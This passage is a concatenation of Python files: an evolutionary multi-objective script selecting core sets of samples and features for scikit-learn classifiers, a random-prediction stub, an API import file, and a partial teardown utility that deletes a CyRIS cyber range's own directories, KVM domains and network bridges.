sklearn.linear_model import LinearRegression from sklearn.linear_model import LogisticRegression from sklearn.linear_model import LogisticRegressionCV from sklearn.linear_model import PassiveAggressiveClassifier from sklearn.linear_model import RidgeClassifier from sklearn.linear_model import RidgeClassifierCV from sklearn.linear_model import SGDClassifier from sklearn.svm import SVC # pandas from pandas import read_csv import seaborn as sns from matplotlib.colors import ListedColormap import warnings warnings.filterwarnings("ignore") def main(selectedDataset = "digits", pop_size = 100, max_generations = 100): # a few hard-coded values figsize = [5, 4] seed = 42 max_points_in_core_set = 99 min_points_in_core_set = 1 # later redefined as 1 per class # pop_size = 300 offspring_size = 2 * pop_size # max_generations = 300 maximize = False # selectedDataset = "digits" selectedClassifiers = ["SVC"] n_splits = 10 # a list of classifiers allClassifiers = [ [RandomForestClassifier, "RandomForestClassifier", 1], [BaggingClassifier, "BaggingClassifier", 1], [SVC, "SVC", 1], [RidgeClassifier, "RidgeClassifier", 1], # [AdaBoostClassifier, "AdaBoostClassifier", 1], # [ExtraTreesClassifier, "ExtraTreesClassifier", 1], # [GradientBoostingClassifier, "GradientBoostingClassifier", 1], # [SGDClassifier, "SGDClassifier", 1], # [PassiveAggressiveClassifier, "PassiveAggressiveClassifier", 1], # [LogisticRegression, "LogisticRegression", 1], ] selectedClassifiers = [classifier[1] for classifier in allClassifiers] folder_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-evocore2C-" + selectedDataset + "-" + str(pop_size) if not os.path.exists(folder_name) : os.makedirs(folder_name) else : sys.stderr.write("Error: folder \"" + folder_name + "\" already exists. Aborting...\n") sys.exit(0) # open the logging file logfilename = os.path.join(folder_name, 'logfile.log') logger = setup_logger('logfile_' + folder_name, logfilename) logger.info("All results will be saved in folder \"%s\"" % folder_name) # load different datasets, prepare them for use logger.info("Preparing data...") # synthetic databases # centers = [[1, 1], [-1, -1], [1, -1]] # blobs_X, blobs_y = make_blobs(n_samples=400, centers=centers, n_features=2, cluster_std=0.6, random_state=seed) # circles_X, circles_y = make_circles(n_samples=400, noise=0.15, factor=0.4, random_state=seed) # moons_X, moons_y = make_moons(n_samples=400, noise=0.2, random_state=seed) # iris = datasets.load_iris() # digits = datasets.load_digits() wine = datasets.load_wine() # breast = datasets.load_breast_cancer() # pairs = datasets.fetch_lfw_pairs() # olivetti = datasets.fetch_olivetti_faces() # forest_X, forest_y = loadForestCoverageType() # local function # mnist_X, mnist_y = loadMNIST() # local function # plants = datasets.fetch_openml(name='one-hundred-plants-margin', cache=False) # isolet = datasets.fetch_openml(name='isolet', cache=False) # ctg = datasets.fetch_openml(name='cardiotocography', cache=False) # ozone = datasets.fetch_openml(name='ozone-level-8hr', cache=False) # ilpd = datasets.fetch_openml(name='ilpd', cache=False) # biodeg = datasets.fetch_openml(name='qsar-biodeg', cache=False) # hill = datasets.fetch_openml(name='hill-valley', cache=False) dataList = [ # [blobs_X, blobs_y, 0, "blobs"], # [circles_X, circles_y, 0, "circles"], # [moons_X, moons_y, 0, "moons"], # [iris.data, iris.target, 0, "iris4"], # [iris.data[:, 2:4], iris.target, 0, "iris2"], # [digits.data, digits.target, 0, "digits"], [wine.data, wine.target, 0, "wine"], # [breast.data, breast.target, 0, "breast"], # [pairs.data, pairs.target, 0, "pairs"], # [olivetti.data, olivetti.target, 0, "people"], # [forest_X, forest_y, 0, "covtype"], # [mnist_X, mnist_y, 0, "mnist"], # [plants.data, plants.target, 0, "plants"], # [isolet.data, isolet.target, 0, "isolet"], # [ctg.data, ctg.target, 0, "ctg"], # [ozone.data, ozone.target, 0, "ozone"], # [ilpd.data, ilpd.target, 0, "ilpd"], # [biodeg.data, biodeg.target, 0, "biodeg"], # [hill.data, hill.target, 0, "hill-valley"], ] # argparse; all arguments are optional parser = argparse.ArgumentParser() parser.add_argument("--classifiers", "-c", nargs='+', help="Classifier(s) to be tested. Default: %s. Accepted values: %s" % (selectedClassifiers[0], [x[1] for x in allClassifiers])) parser.add_argument("--dataset", "-d", help="Dataset to be tested. Default: %s. Accepted values: %s" % (selectedDataset,[x[3] for x in dataList])) parser.add_argument("--pop_size", "-p", type=int, help="EA population size. Default: %d" % pop_size) parser.add_argument("--offspring_size", "-o", type=int, help="Ea offspring size. Default: %d" % offspring_size) parser.add_argument("--max_generations", "-mg", type=int, help="Maximum number of generations. Default: %d" % max_generations) parser.add_argument("--min_points", "-mip", type=int, help="Minimum number of points in the core set. Default: %d" % min_points_in_core_set) parser.add_argument("--max_points", "-mxp", type=int, help="Maximum number of points in the core set. Default: %d" % max_points_in_core_set) # finally, parse the arguments args = parser.parse_args() # a few checks on the (optional) inputs if args.dataset : selectedDataset = args.dataset if selectedDataset not in [x[3] for x in dataList] : print("Error: dataset \"%s\" is not an accepted value. Accepted values: %s" % (selectedDataset, [x[3] for x in dataList])) sys.exit(0) if args.classifiers != None and len(args.classifiers) > 0 : selectedClassifiers = args.classifiers for c in selectedClassifiers : if c not in [x[1] for x in allClassifiers] : print("Error: classifier \"%s\" is not an accepted value. Accepted values: %s" % (c, [x[1] for x in allClassifiers])) sys.exit(0) if args.min_points : min_points_in_core_set = args.min_points if args.max_points : max_points_in_core_set = args.max_points if args.max_generations : max_generations = args.max_generations if args.pop_size : pop_size = args.pop_size if args.offspring_size : offspring_size = args.offspring_size # TODO: check that min_points < max_points and max_generations > 0 # print out the current settings logger.info("Settings of the experiment...") logger.info("Fixed random seed:", seed) logger.info("Selected dataset: %s; Selected classifier(s): %s" % (selectedDataset, selectedClassifiers)) # logger.info("Min points in candidate core set: %d; Max points in candidate core set: %d" % (min_points_in_core_set, max_points_in_core_set)) logger.info("Population size in EA: %d; Offspring size: %d; Max generations: %d" % (pop_size, offspring_size, max_generations)) # create the list of classifiers classifierList = [ x for x in allClassifiers if x[1] in selectedClassifiers ] # pick the dataset db_index = -1 for i in range(0, len(dataList)) : if dataList[i][3] == selectedDataset : db_index = i dbname = dataList[db_index][3] X, y = dataList[db_index][0], dataList[db_index][1] number_classes = np.unique(y).shape[0] logger.info("Creating train/test split...") from sklearn.model_selection import StratifiedKFold skf = StratifiedKFold(n_splits=n_splits, shuffle=True, random_state=seed) listOfSplits = [split for split in skf.split(X, y)] trainval_index, test_index = listOfSplits[0] X_trainval, y_trainval = X[trainval_index], y[trainval_index] X_test, y_test = X[test_index], y[test_index] skf = StratifiedKFold(n_splits=3, shuffle=False, random_state=seed) listOfSplits = [split for split in skf.split(X_trainval, y_trainval)] train_index, val_index = listOfSplits[0] X_train, y_train = X_trainval[train_index], y_trainval[train_index] X_val, y_val = X_trainval[val_index], y_trainval[val_index] logger.info("Training set: %d lines (%.2f%%); test set: %d lines (%.2f%%)" % (X_trainval.shape[0], (100.0 * float(X_trainval.shape[0]/X.shape[0])), X_test.shape[0], (100.0 * float(X_test.shape[0]/X.shape[0])))) # rescale data scaler = StandardScaler() sc = scaler.fit(X_train) X = sc.transform(X) X_trainval = sc.transform(X_trainval) X_train = sc.transform(X_train) X_val = sc.transform(X_val) X_test = sc.transform(X_test) for classifier in classifierList: classifier_name = classifier[1] # start creating folder name experiment_name = os.path.join(folder_name, datetime.datetime.now().strftime("%Y-%m-%d-%H-%M")) + "-core-set-evolution-" + dbname + "-" + classifier_name if not os.path.exists(experiment_name) : os.makedirs(experiment_name) logger.info("Classifier used: " + classifier_name) max_points_in_core_set = X_train.shape[0] start = time.time() min_points_in_core_set = number_classes solutions, trainAccuracy, testAccuracy = evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize, seed=seed, experiment_name=experiment_name) end = time.time() exec_time = end - start # only candidates with all classes are considered final_archive = [] for sol in solutions : c = sol.candidate individual = np.array(c, dtype=bool) indPoints = individual[ :X_train.shape[0] ] y_core = y_train[indPoints] if len(set(y_core)) == number_classes : final_archive.append(sol) # logger.info("Now saving final Pareto front in a figure...") pareto_front_x = [ f.fitness[0] for f in final_archive ] pareto_front_y = [ f.fitness[1] for f in final_archive ] pareto_front_z = [ f.fitness[2] for f in final_archive ] # figure = plt.figure(figsize=figsize) # ax = figure.add_subplot(111) # ax.plot(pareto_front_x, pareto_front_y, "bo-", label="Solutions in final archive") # ax.set_title("Optimal solutions") # ax.set_xlabel("Core set size") # ax.set_ylabel("Error") # ax.set_xlim([1, X_train.shape[0]]) # ax.set_ylim([0, 0.4]) # plt.tight_layout() # plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.png" %(dbname, classifier_name)) ) # plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto.pdf" %(dbname, classifier_name)) ) # plt.close(figure) figure = plt.figure(figsize=figsize) ax = figure.add_subplot(111) ax.plot(pareto_front_x, pareto_front_y, "bo", label="Solutions in final archive") ax.set_title("Optimal solutions") ax.set_xlabel("Core set size") ax.set_ylabel("Core feature size") plt.tight_layout() plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.png" %(dbname, classifier_name)) ) plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xy.pdf" %(dbname, classifier_name)) ) plt.close(figure) figure = plt.figure(figsize=figsize) ax = figure.add_subplot(111) ax.plot(pareto_front_x, pareto_front_z, "bo", label="Solutions in final archive") ax.set_title("Optimal solutions") ax.set_xlabel("Core set size") ax.set_ylabel("Error") plt.tight_layout() plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.png" %(dbname, classifier_name)) ) plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_xz.pdf" %(dbname, classifier_name)) ) plt.close(figure) figure = plt.figure(figsize=figsize) ax = figure.add_subplot(111) ax.plot(pareto_front_y, pareto_front_z, "bo", label="Solutions in final archive") ax.set_title("Optimal solutions") ax.set_xlabel("Core feature size") ax.set_ylabel("Error") plt.tight_layout() plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.png" %(dbname, classifier_name)) ) plt.savefig( os.path.join(experiment_name, "%s_EvoCore_%s_pareto_zoom_yz.pdf" %(dbname, classifier_name)) ) plt.close(figure) # initial performance X_err, testAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed) X_err, trainAccuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed) # logger.info("Compute performances!") logger.info("Problem dimensions: #samples: %d - #features: %d - #classes: %d" % (X.shape[0], X.shape[1], number_classes)) logger.info("Initial performance with #samples: %d - #features: %d --> train=%.4f, test=%.4f" % (X_trainval.shape[0], X.shape[1], trainAccuracy, testAccuracy)) logger.info("Elapsed time using EvoCore2C (seconds): %.4f" %(exec_time)) # best solution accuracy = [] for sol in final_archive : c = sol.candidate individual = np.array(c, dtype=bool) indPoints = individual[ :X_train.shape[0] ] indFeatures = individual[ X_train.shape[0]: ] X_core = X_train[indPoints] X_core = X_core[:, indFeatures] y_core = y_train[indPoints] X_trainval_t = X_trainval[:, indFeatures] X_train_t = X_train[:, indFeatures] X_val_t = X_val[:, indFeatures] X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed) X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed) accuracy.append( np.mean([accuracy_val, accuracy_train]) ) best_ids = np.array(np.argsort(accuracy)).astype('int')[::-1] count = 0 for i in best_ids: if count > 2: break c = final_archive[i].candidate individual = np.array(c, dtype=bool) indPoints = individual[ :X_train.shape[0] ] indFeatures = individual[ X_train.shape[0]: ] X_core = X_train[indPoints] X_core = X_core[:, indFeatures] y_core = y_train[indPoints] X_t = X[:, indFeatures] X_trainval_t = X_trainval[:, indFeatures] X_train_t = X_train[:, indFeatures] X_val_t = X_val[:, indFeatures] X_test_t = X_test[:, indFeatures] X_err, accuracy_train, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_train_t, y_train, classifier[0], cname=classifier_name, SEED=seed) X_err, accuracy_val, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_val_t, y_val, classifier[0], cname=classifier_name, SEED=seed) X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_core, y_core, X_test_t, y_test, classifier[0], cname=classifier_name, SEED=seed) logger.info("Solution %d: #samples: %d - #features: %d --> train: %.4f, val: %.4f, test: %.4f" %(count, X_core.shape[0], X_core.shape[1], accuracy_train, accuracy_val, accuracy)) if (dbname == "mnist" or dbname == "digits") and count == 0: if dbname == "mnist": H, W = 28, 28 if dbname == "digits": H, W = 8, 8 # logger.info("Now saving figures...") core_features = np.zeros((X_train.shape[1], 1)) core_features[indFeatures] = 1 core_features = np.reshape(core_features, (H, W)) flatui = ["#ffffff", "#e74c3c"] cmap = ListedColormap(sns.color_palette(flatui).as_hex()) # sns.palplot(sns.color_palette(flatui)) X_t = np.zeros((X_core.shape[0], H*W)) k = 0 for i in range(0, len(indFeatures)): if indFeatures[i] == True: X_t[:, i] = X_core[:, k] k = k + 1 # # save archetypes # for index in range(0, len(y_core)): # image = np.reshape(X_t[index, :], (H, W)) # plt.figure() # plt.axis('off') # plt.imshow(image, cmap=plt.cm.gray_r) # plt.imshow(core_features, cmap=cmap, alpha=0.3) # plt.title('Label: %d' %(y_core[index])) # plt.tight_layout() # plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.pdf" %(y_core[index], index)) ) # plt.savefig( os.path.join(experiment_name, "digit_%d_idx_%d.png" %(y_core[index], index)) ) # plt.close() # save test errors e = 1 for index in range(0, len(y_test)): if fail_points[index] == True: image = np.reshape(X_test[index, :], (H, W)) plt.figure() plt.axis('off') plt.imshow(image, cmap=plt.cm.gray_r) plt.imshow(core_features, cmap=cmap, alpha=0.3) plt.title('Label: %d - Prediction: %d' %(y_test[index], y_pred[index])) plt.tight_layout() plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.pdf" %(y_test[index], y_pred[index], e)) ) plt.savefig( os.path.join(experiment_name, "err_lab_%d_pred_%d_idx_%d.png" %(y_test[index], y_pred[index], e)) ) plt.close() e = e + 1 # plot decision boundaries if we have only 2 dimensions! if X_core.shape[1] == 2: cmap = ListedColormap(sns.color_palette("bright", 3).as_hex()) xx, yy = make_meshgrid(X_t[:, 0], X_t[:, 1]) figure = plt.figure(figsize=figsize) _, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2) # plt.scatter(X_train[:, 0], X_train[:, 1], c=y_train, cmap=cmap, marker='s', alpha=0.4, label="train") plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.3, label="test") plt.scatter(X_core[:, 0], X_core[:, 1], c=y_core, cmap=cmap, marker='D', facecolors='none', edgecolors='none', alpha=1, label="core set") plt.scatter(X_err[:, 0], X_err[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors") plt.legend() plt.title("%s - acc. %.4f" %(classifier_name, accuracy)) plt.tight_layout() plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.png" %(dbname, classifier_name, count)) ) plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_%d.pdf" %(dbname, classifier_name, count)) ) plt.close(figure) if count == 0: # using all samples in the training set X_err, accuracy, model, fail_points, y_pred = evaluate_core(X_trainval, y_trainval, X_test, y_test, classifier[0], cname=classifier_name, SEED=seed) X_err_t = X_err[:, indFeatures] X_err_train, trainAccuracy, model_train, fail_points_train, y_pred_train = evaluate_core(X_trainval, y_trainval, X_trainval, y_trainval, classifier[0], cname=classifier_name, SEED=seed) figure = plt.figure(figsize=figsize) # _, Z_0 = plot_contours(model, xx, yy, colors='k', alpha=0.2) plt.scatter(X_trainval_t[:, 0], X_trainval_t[:, 1], c=y_trainval, cmap=cmap, marker='s', alpha=0.4, label="train") plt.scatter(X_test_t[:, 0], X_test_t[:, 1], c=y_test, cmap=cmap, marker='+', alpha=0.4, label="test") plt.scatter(X_err_t[:, 0], X_err_t[:, 1], marker='x', facecolors='k', edgecolors='k', alpha=1, label="errors") plt.legend() plt.title("%s - acc. %.4f" %(classifier_name, accuracy)) plt.tight_layout() plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.png" %(dbname, classifier_name)) ) plt.savefig( os.path.join(experiment_name, "%s_EvoCore2C_%s_alltrain.pdf" %(dbname, classifier_name)) ) plt.close(figure) count = count + 1 logger.handlers.pop() return # function that does most of the work def evolveCoreSets(X, y, X_train, y_train, X_test, y_test, classifier, pop_size, offspring_size, max_generations, min_points_in_core_set, max_points_in_core_set, number_classes, maximize=True, seed=None, experiment_name=None, split="") : classifier_class = classifier[0] classifier_name = classifier[1] classifier_type = classifier[2] # a few checks on the arguments if seed == None : seed = int( time.time() ) if experiment_name == None : experiment_name = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M") + "-ea-impair-" + classifier_name elif split != "" : experiment_name = experiment_name + "/" + classifier_name + "-split-" + split # create filename that will be later used to store whole population all_population_file = os.path.join(experiment_name, "all_individuals.csv") # initialize classifier; some classifiers have random elements, and # for our purpose, we are working with a specific instance, so we fix # the classifier's behavior with a random seed if classifier_type == 1: classifier = classifier_class(random_state=seed) else : classifier = classifier_class() # initialize pseudo-random number generation prng = random.Random() prng.seed(seed) print("Computing initial classifier performance...") referenceClassifier = copy.deepcopy(classifier) referenceClassifier.fit(X_train, y_train) y_train_pred = referenceClassifier.predict(X_train) y_test_pred = referenceClassifier.predict(X_test) y_pred = referenceClassifier.predict(X) trainAccuracy = accuracy_score(y_train, y_train_pred) testAccuracy = accuracy_score(y_test, y_test_pred) overallAccuracy = accuracy_score(y, y_pred) print("Initial performance: train=%.4f, test=%.4f, overall=%.4f" % (trainAccuracy, testAccuracy, overallAccuracy)) print("\nSetting up evolutionary algorithm...") ea = inspyred.ec.emo.NSGA2(prng) ea.variator = [ variate ] ea.terminator = inspyred.ec.terminators.generation_termination ea.observer = observeCoreSets final_population = ea.evolve( generator = generateCoreSets, evaluator = evaluateCoreSets, pop_size = pop_size, num_selected = offspring_size, maximize = maximize, max_generations = max_generations, # extra arguments here n_classes = number_classes, classifier = classifier, X=X, y=y, X_train = X_train, y_train = y_train, X_test = X_test, y_test = y_test, min_points_in_core_set = min_points_in_core_set, max_points_in_core_set = max_points_in_core_set, experimentName = experiment_name, all_population_file = all_population_file, current_time = datetime.datetime.now() ) final_archive = sorted(ea.archive, key = lambda x : x.fitness[1]) return final_archive, trainAccuracy, testAccuracy def setup_logger(name, log_file, level=logging.INFO): """Function setup as many loggers as you want""" formatter = logging.Formatter('%(asctime)s %(message)s') handler = logging.FileHandler(log_file) handler.setFormatter(formatter) logger = logging.getLogger(name) logger.setLevel(level) logger.addHandler(handler) return logger # utility function to load the covtype dataset def loadForestCoverageType() : inputFile = "../data/covtype.csv" #logger.info("Loading file \"" + inputFile + "\"...") df_covtype = read_csv(inputFile, delimiter=',', header=None) # class is the last column covtype = df_covtype.as_matrix() X = covtype[:,:-1] y = covtype[:,-1].ravel()-1 return X, y def loadMNIST(): mnist = tf.keras.datasets.mnist (x_train, y_train),(x_test, y_test) = mnist.load_data() X = np.concatenate((x_train, x_test)) X = np.reshape(X, (X.shape[0], X.shape[1] * X.shape[1])) y = np.concatenate((y_train, y_test)) return X, y def make_meshgrid(x, y, h=.02): x_min, x_max = x.min() - 1, x.max() + 1 y_min, y_max = y.min() - 1, y.max() + 1 xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h)) return xx, yy def plot_contours(clf, xx, yy, **params): Z = clf.predict(np.c_[xx.ravel(), yy.ravel()]) Z = Z.reshape(xx.shape) out = plt.contour(xx, yy, Z, **params) return out, Z def evaluate_core(X_core, y_core, X, y, classifier, cname=None, SEED=0): if cname == "SVC": referenceClassifier = copy.deepcopy(classifier(random_state=SEED, probability=True)) else: referenceClassifier = copy.deepcopy(classifier(random_state=SEED)) referenceClassifier.fit(X_core, y_core) y_pred = referenceClassifier.predict(X) fail_points = y != y_pred X_err = X[fail_points] accuracy = accuracy_score( y, y_pred) return X_err, accuracy, referenceClassifier, fail_points, y_pred # initial random generation of core sets (as binary strings) def generateCoreSets(random, args) : individual_length = args["X_train"].shape[0] + args["X_train"].shape[1] individual = [0] * individual_length points_in_core_set = random.randint( args["min_points_in_core_set"], args["max_points_in_core_set"] ) for i in range(points_in_core_set) : random_index = random.randint(0, args["X_train"].shape[0]-1) individual[random_index] = 1 features_in_core_set = random.randint( 1, args["X_train"].shape[1] ) for i in range(features_in_core_set) : random_index = random.randint(args["X_train"].shape[0], individual_length-1) individual[random_index] = 1 return individual # using inspyred's notation, here is a single operator that performs both # crossover and mutation, sequentially @inspyred.ec.variators.crossover def variate(random, parent1, parent2, args) : # well, for starters we just crossover two individuals, then mutate children = [ list(parent1), list(parent2) ] # one-point crossover! cutPoint = random.randint(0, len(children[0])-1) for index in range(0, cutPoint+1) : temp = children[0][index] children[0][index] = children[1][index] children[1][index] = temp # mutate! for child in children : mutationPoint = random.randint(0, len(child)-1) if child[mutationPoint] == 0 : child[mutationPoint] = 1 else : child[mutationPoint] = 0 # check if individual is still valid, and (in case it isn't) repair it for child in children : if args.get("max_points_in_core_set", None) != None and args.get("min_points_in_core_set", None) != None : points_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index < args["X_train"].shape[0] ] while len(points_in_core_set) > args["max_points_in_core_set"] : index = random.choice( points_in_core_set ) child[index] = 0 points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ] if len(points_in_core_set) < args["min_points_in_core_set"] : index = random.choice( [ index for index, value in enumerate(child) if value == 0 ] ) child[index] = 1 points_in_core_set = [ index for index, value in enumerate(child) if value == 1 ] features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ] if len(features_in_core_set) < 1 : index = random.choice( [ index for index, value in enumerate(child) if value == 0 and index > args["X_train"].shape[0] ] ) child[index] = 1 features_in_core_set = [ index for index, value in enumerate(child) if value == 1 and index > args["X_train"].shape[0] ] return children # function that evaluates the core sets def evaluateCoreSets(candidates, args) : fitness = [] for c in candidates : #print("candidate:", c) cAsBoolArray = np.array(c, dtype=bool) cPoints = cAsBoolArray[ :args["X_train"].shape[0] ] cFeatures = cAsBoolArray[ args["X_train"].shape[0]: ] X_train_reduced = args["X_train"][cPoints, :] X_train_reduced = X_train_reduced[:, cFeatures] y_train_reduced = args["y_train"][cPoints] #print("Reduced training set:", X_train_reduced.shape[0]) #print("Reduced training set:", y_train_reduced.shape[0]) if len(set(y_train_reduced)) == args["n_classes"] : classifier = copy.deepcopy( args["classifier"] ) classifier.fit(X_train_reduced, y_train_reduced) # evaluate accuracy for every point (training, test) X_train = args["X_train"] y_pred_train = classifier.predict( X_train[:, cFeatures] ) #y_pred_test = classifier.predict( args["X_test"] ) #y_pred = np.concatenate((y_pred_train, y_pred_test)) #y = np.concatenate((args["y_train"], args["y_test"])) #accuracy = accuracy_score(y, y_pred) accuracy = accuracy_score(args["y_train"], y_pred_train) error = round(1-accuracy, 4) # also store valid individual # all_population_file = args.get("all_population_file", None) # if all_population_file != None : # # # if the file does not exist, write header # if not os.path.exists(all_population_file) : # with open(all_population_file, "w") as fp : # fp.write("#points,accuracy,individual\n") # # # in any case, append individual # with open(all_population_file, "a") as fp : # fp.write( str(len([ x for x in c if x == 1])) ) # fp.write( "," + str(accuracy) ) # # for g in c : # fp.write( "," + str(g) ) # fp.write("\n") else: # individual gets a horrible fitness value maximize = args["_ec"].maximize # let's fetch the bool that tells us if we are maximizing or minimizing if maximize == True : error = -np.inf else : error = np.inf # maximizing the points removed also means minimizing the number of points taken (LOL) corePoints = sum(cPoints) coreFeatures = sum(cFeatures) fitness.append( inspyred.ec.emo.Pareto( [corePoints, coreFeatures, error] ) ) return fitness # the 'observer' function is called by inspyred algorithms at the end of every generation def observeCoreSets(population, num_generations, num_evaluations, args) : # training_set_size = args["X_train"].shape[0] old_time = args["current_time"] current_time = datetime.datetime.now() delta_time = current_time - old_time # I don't like the 'timedelta' string format, so here is some fancy formatting delta_time_string = str(delta_time)[:-7] + "s" print("[%s] Generation %d, Random individual: #samples=%d, #features=%d, error=%.2f" % (delta_time_string, num_generations, population[0].fitness[0], population[0].fitness[1], population[0].fitness[2])) args["current_time"] = current_time return if __name__ == "__main__" : # dataList = [ # ["blobs", 200, 1000], # ["circles", 200, 1000], # ["moons", 200, 1000], # ["iris4", 200, 1000], # ["iris2", 500, 500], # ["digits", 200, 1000], # #["covtype", 10, 5], # #["mnist", 10, 5], # ] dataList = [ # ["blobs", 200, 200], # ["circles", 200, 200], # ["moons", 200, 200], # ["iris4", 20, 20], # ["iris2", 200, 200], # ["digits", 200, 200], # ["wine", 200, 200], # ["breast", 200, 200], # ["pairs", 200, 200], # ["olivetti", 200, 200], # ["covtype", 200, 200], # ["mnist", 200, 200], # ["plants", 200, 200], # ["isolet", 200, 200], # ["ctg", 200, 200], # ["ozone", 200, 200], # ["ilpd", 200, 200], # ["biodeg", 200, 200], # ["hill-valley", 200, 200], ] # dataList = [ # ["blobs", 100, 100], # ["circles", 100, 100], # ["moons", 100, 100], # ["iris4", 100, 100], # ["iris2", 100, 100], # ["digits", 100, 100], # ["covtype", 100, 100], # ["mnist", 100, 100], # ] for dataset in dataList: main(dataset[0], dataset[1], dataset[2]) sys.exit()
# rndly.py import numpy as np import time class RNDLy: def __init__(self): self.name = 'rndly' def predict(self,queryList): lo = 0.0 hi = 1.0 n = len(queryList) preds = np.random.uniform(lo,hi,n) preds = preds.tolist() time.sleep(0.5) return preds def close(self): pass
from .YelpAPI import YelpAuth from .YelpAPI import YelpAPI from .HereAPI import HereAuth from .HereAPI import HereAPI
#!/usr/bin/python ############################################################################# # Range cleanup program ############################################################################# import os import sys import subprocess import logging import parse_config logging.basicConfig(level=logging.INFO, format='* %(levelname)s: %(filename)s: %(message)s') # Default values for the essential parameters RANGE_ID = 123 CYRIS_PATH = "/home/cyuser/cyris/" RANGE_PATH = "/home/cyuser/cyris/cyber_range/" # Constants SETTINGS_DIR = "settings/" DESTRUCTION_SCRIPT1 = "whole-controlled-destruction.sh" DESTRUCTION_SCRIPT2 = "destruct_cyberrange.sh" # Not used yet # Try to call the range destruction script prepared by CyRIS # Return True on success, False on failure, or if the script does not exist def range_destruction(range_id, range_path): # Create the full name of the destruction script destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT1) if os.path.isfile(destruction_script_full): # Try to call the script logging.debug("Use destruction script: " + destruction_script_full) exit_value = subprocess.call(["bash", destruction_script_full]) if exit_value == 0: return True # Code below is not working for some reason, but we'll try again in the future to enable it, # as the script "destruct_cyberrange.sh" is created earlier than "whole-controlled-destruction.sh", # hence it could be used instead for forceful cleanup # else: # destruction_script_full = "{0}{1}/{2}".format(range_path, range_id, DESTRUCTION_SCRIPT2) # if os.path.isfile(destruction_script_full): # # Try to call the script # logging.debug("Use destruction script: " + destruction_script_full) # exit_value = subprocess.call(["bash", destruction_script_full]) # if exit_value == 0: # return True logging.warning("Destruction script not found or error.") return False # Forceful cleanup of storage (relevant files and directories) def storage_cleanup(range_id, cyris_path, range_path): # Create the range directory name range_dir = "{0}{1}/".format(range_path, range_id) # Try to call the script logging.info("Clean up range directory: " + range_dir) # Run rm command (should use confirmation?) subprocess.call(["rm", "-rf", range_dir]) # TODO: clean up special files in settings: 123pssh.txt, etc. pscp_filename = "{0}{1}{2}pscp_host.txt".format(cyris_path, SETTINGS_DIR, range_id) pssh_filename = "{0}{1}{2}pssh_host.txt".format(cyris_path, SETTINGS_DIR, range_id) logging.info("Clean up range host files: " + pscp_filename + " and " + pssh_filename) subprocess.call(["rm", "-f", pscp_filename]) subprocess.call(["rm", "-f", pssh_filename]) # Forceful cleanup via KVM virsh def kvm_cleanup(range_id): range_string = "_cr{}_".format(range_id) command = "virsh list --all" output = subprocess.check_output(command, shell=True) lines = output.splitlines() cleanup_done = False logging.info("Clean up KVM domains containing 'cr{}'.".format(range_id)) for line in lines: if range_string in line: fields = line.split() for field in fields: if range_string in field: cleanup_done = True subprocess.call(["virsh", "destroy", field]) subprocess.call(["virsh", "undefine", field]) if not cleanup_done: logging.warning("No relevant KVM domains found.") # Forceful network cleanup def network_cleanup(range_id): logging.info("Clean up bridges containing 'br{}'.".format(range_id)) # TODO: Use ifconfig to determine all bridge names that start with br{range_id} bridge_name = "br{}-1-1".format(range_id) try: # Shut down bridge ifdown_command = "sudo ifconfig {} down".format(bridge_name) output = subprocess.check_output(ifdown_command, shell=True, stderr=subprocess.STDOUT) # Delete bridge brctl_command = "sudo brctl delbr {}".format(bridge_name) output = subprocess.check_output(brctl_command, shell=True, stderr=subprocess.STDOUT) except subprocess.CalledProcessError as error: logging.warning("Error when removing bridge {}.\n Error message: {}" .format(bridge_name, error.output.rstrip())) def main(argv): # Assign default values range_id = RANGE_ID cyris_path = CYRIS_PATH range_path = RANGE_PATH if len(argv) >= 1: # First argument (if exists) is range id range_id = argv[0] if len(argv) >= 2: # Second argument (if exists) is config file name config_file = argv[1] cyris_path_parsed, range_path_parsed, p2, p3, p4, p5, p6 = parse_config.parse_config(config_file) if cyris_path_parsed: cyris_path = cyris_path_parsed if range_path_parsed: range_path = range_path_parsed # Handle case when directory names don't end with "/" if not cyris_path.endswith("/"): cyris_path += "/" if not range_path.endswith("/"): range_path += "/" logging.info("Do cleanup for range #{0}.".format(range_id)) # First we try the normal range destruction logging.info("Use scripts generated when the range was created.") did_destroy = range_destruction(range_id, range_path) # Then we do cleanup via KVM virsh in case normal destruction failed if not did_destroy: 